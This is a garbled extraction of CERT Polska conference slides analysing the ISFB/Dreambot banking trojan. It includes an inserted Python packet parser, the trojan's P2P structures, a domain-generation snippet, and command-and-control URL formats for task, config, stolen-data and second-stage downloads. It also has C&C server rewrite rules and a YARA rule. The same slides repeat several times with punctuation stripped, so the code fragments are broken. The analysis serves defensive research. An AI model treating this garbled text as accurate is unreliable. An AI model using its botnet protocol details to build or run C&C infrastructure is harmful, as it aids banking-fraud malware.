        DWORD his_secret;
        BYTE  cmd0;
        BYTE  cmd1;
        BYTE  data[];
    } isfb_p2p_inner_packet;

    typedef struct {
        BYTE  flags;
        DWORD salt;                 // 4 random higher bytes of keys
        isfb_p2p_inner_packet p;    // encrypted
    } isfb_p2p_packet;

C
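Added example, not the author's code: a Python parser for the packet layout above that rejects truncated buffers and a wrong magic. It assumes a packed little-endian wire layout and, since the cipher is not on the slide, treats the inner packet as already decrypted; the sample packet is constructed.

```python
import struct

# Added example, not the author's code: unpack the P2P packet layout from the slide's
# C structs. Assumes the wire layout is packed (no alignment padding after the 1-byte
# flags field) and little-endian; the cipher covering the inner packet is not shown on
# the slide, so the sample below uses the plaintext inner packet in its place.
P2P_MAGIC = 0x395F2EC1
OUTER_HDR = struct.Struct("<BI")     # BYTE flags; DWORD salt (high bytes of the key)
INNER_HDR = struct.Struct("<IIIBB")  # DWORD magic, my_secret, his_secret; BYTE cmd0, cmd1


def split_outer(pkt: bytes):
    """Return (flags, salt, encrypted_inner) from an isfb_p2p_packet, None if truncated."""
    if len(pkt) < OUTER_HDR.size:
        return None
    flags, salt = OUTER_HDR.unpack_from(pkt)
    return flags, salt, pkt[OUTER_HDR.size:]


def parse_inner(buf: bytes):
    """Parse a decrypted isfb_p2p_inner_packet; None when the buffer is shorter than the
    fixed header or the magic does not match (wrong key, or not an ISFB peer message)."""
    if len(buf) < INNER_HDR.size:
        return None
    magic, my_secret, his_secret, cmd0, cmd1 = INNER_HDR.unpack_from(buf)
    if magic != P2P_MAGIC:
        return None
    return {"my_secret": my_secret, "his_secret": his_secret,
            "cmd0": cmd0, "cmd1": cmd1, "data": buf[INNER_HDR.size:]}


# Constructed sample packet: flags=1, salt=0xDEADBEEF, inner packet with two secrets,
# cmd0=1, cmd1=2 and a 5-byte payload.
SAMPLE_INNER = INNER_HDR.pack(P2P_MAGIC, 0x11111111, 0x22222222, 1, 2) + b"hello"
SAMPLE_PACKET = OUTER_HDR.pack(0x01, 0xDEADBEEF) + SAMPLE_INNER

if __name__ == "__main__":
    flags, salt, enc = split_outer(SAMPLE_PACKET)
    print(hex(flags), hex(salt), parse_inner(enc))
```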

Internet is Hard

URL format

Request format string (printf specifiers and separators restored; they were lost in extraction):

    http://%s/%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

Request in the t[RAND].php?[RAND]=data form used until Sep 2015:

    /tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY

Decrypted request body:

    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

Current request form:

    cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul/jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 35: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 36: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 37: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 38: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 39: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

